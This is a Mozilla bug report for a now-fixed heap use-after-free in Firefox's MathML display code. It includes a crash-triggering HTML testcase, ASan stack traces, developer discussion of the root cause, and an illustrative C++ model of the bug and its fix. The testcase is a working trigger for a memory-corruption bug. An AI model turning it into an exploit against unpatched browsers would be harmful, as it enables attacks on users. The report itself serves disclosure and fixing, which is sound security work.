Bug 1426345 (Closed)
heap-use-after-free in nsDisplayMathMLCharForeground::GetBounds
Opened 8 years ago; closed 8 years ago
Categories: Core :: MathML, defect
Status: VERIFIED FIXED (mozilla59)
 | Tracking | Status
---|---|---
firefox-esr52 | --- | unaffected
firefox57 | --- | unaffected
firefox58 | + | verified
firefox59 | + | verified
People: Reporter: nils, Assigned: MatsPalmgren_bugz
Details: 4 keywords, Whiteboard: [post-critsmash-triage]
Attachments (3 files):
- 685 bytes, text/html
- 21.14 KB, text/plain
- 1.39 KB, patch (mattwoodrow: review+; abillings: approval-mozilla-beta+, sec-approval+)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=a235bf4868ab9e48c7b2f4bf4cc9bd949ca23c35)
crash.html:
<script>
function spin () {
// A synchronous XHR spins the event loop (see SpinEventLoopUntil in the
// allocation stack below), so pending restyles are flushed and the MathML
// frames, including the mfenced frame's nsMathMLChar, get built here.
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start() {
o683=document.createElementNS('http://www.w3.org/1998/Math/MathML','math');
o685=document.createElementNS('http://www.w3.org/1998/Math/MathML','mo');
document.documentElement.appendChild(o685);
o688=document.createElementNS('http://www.w3.org/1998/Math/MathML','mfenced');
document.documentElement.appendChild(o688);
o693=document.createElementNS('http://www.w3.org/1998/Math/MathML','msubsup');
o685.appendChild(o693);
spin();
// The attribute change runs AttributeChanged -> RebuildAutomaticDataForChildren
// -> InheritAutomaticData -> RemoveFencesAndSeparators, which deletes the
// nsMathMLChar while a retained display item still points at it; the next
// paint reads it in nsDisplayMathMLCharForeground::GetBounds (free stack below).
o693.setAttribute('style','');undefined;
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==7786==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002a0c10 at pc 0x7fcd1c122f52 bp 0x7ffeb8e528e0 sp 0x7ffeb8e528d8
READ of size 4 at 0x6110002a0c10 thread T0 (file:// Content)
#0 0x7fcd1c122f51 in GetRect /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11
#1 0x7fcd1c122f51 in nsDisplayMathMLCharForeground::GetBounds(nsDisplayListBuilder*, bool*) const /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.cpp:1885
#2 0x7fcd1c1b6774 in GetClippedBounds /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:3192:14
#3 0x7fcd1c1b6774 in nsDisplayList::GetClippedBoundsWithRespectToASR(nsDisplayListBuilder*, mozilla::ActiveScrolledRoot const*, nsRect*) const /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2280
#4 0x7fcd1c1b1953 in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /builds/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:5627:30
#5 0x7fcd1c24016b in nsDisplayList::PaintRoot(nsDisplayListBuilder*, gfxContext*, unsigned int) /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2577:9
#6 0x7fcd1b98938b in nsLayoutUtils::PaintFrame(gfxContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3940:12
#7 0x7fcd1b869c14 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:6496:5
#8 0x7fcd1afa59ea in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:480:19
#9 0x7fcd1afa44ec in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /builds/worker/workspace/build/src/view/nsViewManager.cpp:412:33
#10 0x7fcd1afa8406 in nsViewManager::ProcessPendingUpdates() /builds/worker/workspace/build/src/view/nsViewManager.cpp:1102:5
#11 0x7fcd1b7b4de9 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2046:11
#12 0x7fcd1b7c188f in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
#13 0x7fcd1b7c188f in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
#14 0x7fcd1b7c1456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
#15 0x7fcd1b7c3cce in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
#16 0x7fcd1b7c3cce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
#17 0x7fcd1b7c38ce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
#18 0x7fcd1c0afecf in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#19 0x7fcd14ff9190 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
#20 0x7fcd14ea5418 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1812:28
#21 0x7fcd14aae61e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2110:25
#22 0x7fcd14aab697 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2040:17
#23 0x7fcd14aacd9c in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1886:5
#24 0x7fcd14aad3f8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1919:15
#25 0x7fcd13c117c6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
#26 0x7fcd13c2d2b0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
#27 0x7fcd14ab673a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#28 0x7fcd14a0d6c9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#29 0x7fcd14a0d6c9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#30 0x7fcd14a0d6c9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#31 0x7fcd1b02f5ba in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
#32 0x7fcd1f75ca4b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
#33 0x7fcd14a0d6c9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#34 0x7fcd14a0d6c9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#35 0x7fcd14a0d6c9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#36 0x7fcd1f75c43d in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:34
#37 0x4ee965 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#38 0x4ee965 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#39 0x7fcd327ce560 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20560)
#40 0x41dfe8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41dfe8)
0x6110002a0c10 is located 16 bytes inside of 200-byte region [0x6110002a0c00,0x6110002a0cc8)
freed by thread T0 (file:// Content) here:
#0 0x4bea42 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
#1 0x7fcd1c0f5080 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:183:12
#2 0x7fcd1c0f5080 in nsMathMLmfencedFrame::RemoveFencesAndSeparators() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:87
#3 0x7fcd1c0f5588 in nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:39:3
#4 0x7fcd1c0f690f in non-virtual thunk to nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp
#5 0x7fcd1c0d2960 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:660:25
#6 0x7fcd1c114118 in nsMathMLmoFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmoFrame.cpp:1027:3
#7 0x7fcd1b833d9d in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2759:12
#8 0x7fcd1c0d365a in nsMathMLContainerFrame::AttributeChanged(int, nsAtom*, int) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:774:5
#9 0x7fcd1b8976be in mozilla::ServoRestyleManager::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1482:19
#10 0x7fcd1b853737 in AttributeChanged /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:72:3
#11 0x7fcd1b853737 in mozilla::PresShell::AttributeChanged(nsIDocument*, mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4425
#12 0x7fcd16f3d61e in nsNodeUtils::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:140:3
#13 0x7fcd16bcd9c4 in mozilla::dom::Element::SetAttrAndNotify(int, nsAtom*, nsAtom*, nsAttrValue const*, nsAttrValue&, nsIPrincipal*, unsigned char, bool, bool, bool, nsIDocument*, mozAutoDocUpdate const&) /builds/worker/workspace/build/src/dom/base/Element.cpp:2822:5
#14 0x7fcd16bcf6aa in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2648:10
#15 0x7fcd16bc3b22 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:812:12
#16 0x7fcd16bc3b22 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1378
#17 0x7fcd18892c51 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1154:9
#18 0x7fcd18e8a7f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
#19 0x7fcd1fa2ffd4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#20 0x7fcd1fa2ffd4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#21 0x7fcd1fa160b6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#22 0x7fcd1fa160b6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
#23 0x7fcd1fa02820 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#24 0x7fcd1fa3050c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
#25 0x7fcd1fa31032 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#26 0x7fcd2052eddc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2995:12
#27 0x7fcd187ba37e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#28 0x7fcd193848e3 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#29 0x7fcd193848e3 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#30 0x7fcd1934b021 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
#31 0x7fcd1934cf32 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
#32 0x7fcd193363e2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:496:16
#33 0x7fcd19339f58 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
#34 0x7fcd1b93d7fa in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1070:7
#35 0x7fcd1ecace22 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7907:21
previously allocated by thread T0 (file:// Content) here:
#0 0x4bed83 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x4ef7ed in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
#2 0x7fcd1c0f59fa in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:159:12
#3 0x7fcd1c0f59fa in nsMathMLmfencedFrame::CreateFencesAndSeparators(nsPresContext*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:111
#4 0x7fcd1b8f04e2 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4222:28
#5 0x7fcd1b8fa317 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6362:3
#6 0x7fcd1b8d6cb5 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList&, nsContainerFrame*, bool, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10808:5
#7 0x7fcd1b907f99 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind, TreeMatchContext*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7717:3
#8 0x7fcd1b816aac in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1414:27
#9 0x7fcd1b894ba3 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1161:9
#10 0x7fcd1b84ecfe in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1237:3
#11 0x7fcd1b84ecfe in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
#12 0x7fcd1b84ecfe in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4226
#13 0x7fcd1b7b2577 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:580:5
#14 0x7fcd1b7b2577 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1891
#15 0x7fcd1b7c188f in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
#16 0x7fcd1b7c188f in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
#17 0x7fcd1b7c1456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
#18 0x7fcd1b7c3cce in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
#19 0x7fcd1b7c3cce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
#20 0x7fcd1b7c38ce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
#21 0x7fcd1c0afecf in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#22 0x7fcd14ff9190 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
#23 0x7fcd14ea5418 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1812:28
#24 0x7fcd14aae61e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2110:25
#25 0x7fcd14aab697 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2040:17
#26 0x7fcd14aacd9c in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1886:5
#27 0x7fcd14aad3f8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1919:15
#28 0x7fcd13c117c6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
#29 0x7fcd13c2d2b0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
#30 0x7fcd1ae455e3 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
#31 0x7fcd1ae455e3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110
#32 0x7fcd1ae46fd9 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2939:11
#33 0x7fcd1852177e in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
#34 0x7fcd18e8a7f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
#35 0x7fcd1fa2ffd4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#36 0x7fcd1fa2ffd4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#37 0x7fcd1fa160b6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#38 0x7fcd1fa160b6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11 in GetRect
Shadow bytes around the buggy address:
==7786==ABORTING
Anthony, do you know who might be able to work on this? Thanks.
Comment 3 • 8 years ago (Assignee)
This is exactly the same problem as in bug 1417010:
(rr) bt
#0 nsMathMLChar::~nsMathMLChar at layout/mathml/nsMathMLChar.cpp:759
#1 nsMathMLmfencedFrame::RemoveFencesAndSeparators at layout/mathml/nsMathMLmfencedFrame.cpp:87
#2 nsMathMLmfencedFrame::InheritAutomaticData at layout/mathml/nsMathMLmfencedFrame.cpp:39
#3 nsMathMLContainerFrame::RebuildAutomaticDataForChildren at layout/mathml/nsMathMLContainerFrame.cpp:660
#4 nsMathMLmoFrame::MarkIntrinsicISizesDirty at layout/mathml/nsMathMLmoFrame.cpp:1027
#5 mozilla::PresShell::FrameNeedsReflow at layout/base/PresShell.cpp:2757
#6 nsMathMLContainerFrame::AttributeChanged at layout/mathml/nsMathMLContainerFrame.cpp:774
#7 mozilla::ServoRestyleManager::AttributeChanged at layout/base/ServoRestyleManager.cpp:1482
#8 mozilla::RestyleManager::AttributeChanged at dist/include/mozilla/RestyleManagerInlines.h:72
[...]
(see bug 1417010 comment 4)
Assignee: nobody → mats
Flags: needinfo?(ajones)
Comment 4 • 8 years ago (Assignee)
There are several callers of RemoveFencesAndSeparators and I don't
understand why we chose to fix only one of them in bug 1417010.
I think we should invalidate in RemoveFencesAndSeparators instead
to fix all current and future callers.
Attachment #8938821 -
Flags: review?(matt.woodrow)
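The reasoning in comment 4 (invalidate the display items in the routine that destroys the nsMathMLChar, so every caller is covered) as an added C++ model; this is not Gecko code. MathChar, FencedFrame, CharForegroundItem and StaleItemsAfterRebuild are hypothetical stand-ins for nsMathMLChar, nsMathMLmfencedFrame, nsDisplayMathMLCharForeground and the testcase's sequence, and the unsafe and fixed RemoveFencesAndSeparators are shown side by side.

```cpp
// Added illustration (not Gecko code): a miniature of the ownership pattern
// behind this bug. MathChar stands in for nsMathMLChar, FencedFrame for
// nsMathMLmfencedFrame and CharForegroundItem for nsDisplayMathMLCharForeground.
// All names are hypothetical.
#include <algorithm>
#include <cstddef>
#include <memory>
#include <vector>

struct Rect { int x, y, w, h; };

struct MathChar { Rect rect; };

// Retained display item holding a non-owning pointer to a frame-owned MathChar.
struct CharForegroundItem {
  const MathChar* ch;
  Rect GetBounds() const { return ch->rect; }  // the read ASan flagged in nsMathMLChar.h
};

// Display items outlive a single restyle; they go away only when invalidated.
struct DisplayList {
  std::vector<CharForegroundItem> items;
  void Add(const MathChar* c) { items.push_back({c}); }
  // Remove every item that references c; returns how many were dropped.
  size_t InvalidateFor(const MathChar* c) {
    auto tail = std::remove_if(items.begin(), items.end(),
                               [c](const CharForegroundItem& i) { return i.ch == c; });
    size_t dropped = static_cast<size_t>(items.end() - tail);
    items.erase(tail, items.end());
    return dropped;
  }
};

struct FencedFrame {
  std::vector<std::unique_ptr<MathChar>> fences;  // owned, like the frame's fence/separator chars
  DisplayList* list;                              // non-owning
  explicit FencedFrame(DisplayList* l) : list(l) {}

  void CreateFencesAndSeparators(int count) {
    for (int i = 0; i < count; ++i) {
      fences.push_back(std::make_unique<MathChar>(MathChar{{10 * i, 0, 8, 12}}));
      list->Add(fences.back().get());  // the paint side now references this char
    }
  }

  // Shape of the bug: chars are deleted, items keep pointing at freed memory.
  void RemoveFencesAndSeparatorsUnsafe() { fences.clear(); }

  // Shape of the fix proposed in comment 4: invalidate here, so every caller
  // (InheritAutomaticData, the destructor, ...) gets the same guarantee.
  size_t RemoveFencesAndSeparators() {
    size_t invalidated = 0;
    for (auto& f : fences) invalidated += list->InvalidateFor(f.get());
    fences.clear();
    return invalidated;
  }
};

// Counts items whose char the frame no longer owns. Those are exactly the
// items whose GetBounds() would be a use-after-free at the next paint.
size_t StaleItems(const DisplayList& list, const FencedFrame& frame) {
  size_t stale = 0;
  for (const auto& item : list.items) {
    bool owned = std::any_of(frame.fences.begin(), frame.fences.end(),
                             [&](const std::unique_ptr<MathChar>& f) { return f.get() == item.ch; });
    if (!owned) ++stale;
  }
  return stale;
}

// Replays the testcase's sequence: build the frame and its items, then the
// attribute change (RebuildAutomaticDataForChildren -> InheritAutomaticData)
// tears the fences down before the next paint.
size_t StaleItemsAfterRebuild(bool useFix, int fenceCount = 2) {
  DisplayList list;
  FencedFrame frame(&list);
  frame.CreateFencesAndSeparators(fenceCount);  // e.g. an opening and a closing fence
  if (useFix) frame.RemoveFencesAndSeparators();
  else        frame.RemoveFencesAndSeparatorsUnsafe();
  return StaleItems(list, frame);
}
```

With the unsafe path every retained item is left dangling; with the fix the list contains no item for a destroyed char, whichever caller did the teardown.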
Updated • 8 years ago
Attachment #8938821 -
Flags: review?(matt.woodrow) → review+
Comment 5 • 8 years ago (Assignee)
Comment on attachment 8938821 [details] [diff] [review]
Invalidate MathML display items when we destroy the referenced nsMathMLChar
See bug 1417010 comment 12.
This is a follow-up since that fix was incomplete.
Attachment #8938821 -
Flags: sec-approval?
Attachment #8938821 -
Flags: approval-mozilla-beta?
Updated • 8 years ago (Assignee)
Flags: in-testsuite?
Comment 6 • 8 years ago
Comment on attachment 8938821 [details] [diff] [review]
Invalidate MathML display items when we destroy the referenced nsMathMLChar
sec-approval+ and beta approval.
Attachment #8938821 -
Flags: sec-approval?
Attachment #8938821 -
Flags: sec-approval+
Attachment #8938821 -
Flags: approval-mozilla-beta?
Attachment #8938821 -
Flags: approval-mozilla-beta+
Updated • 8 years ago
status-firefox57:
--- → wontfix
status-firefox58:
--- → affected
status-firefox-esr52:
--- → ?
tracking-firefox58:
--- → +
tracking-firefox59:
--- → +
Comment 7 • 8 years ago (Assignee)
uplift
Comment 8 • 8 years ago (Assignee)
Bug 1417010 has firefox57/esr52:unaffected so I'm setting this to the same.
Comment 9 • 8 years ago
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Updated • 8 years ago
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Updated • 8 years ago
Flags: sec-bounty?
Comment 10 • 8 years ago
I have managed to reproduce the issue described in comment 0 using Firefox 59.0a1 (BuildId:20171220094437) asan build.
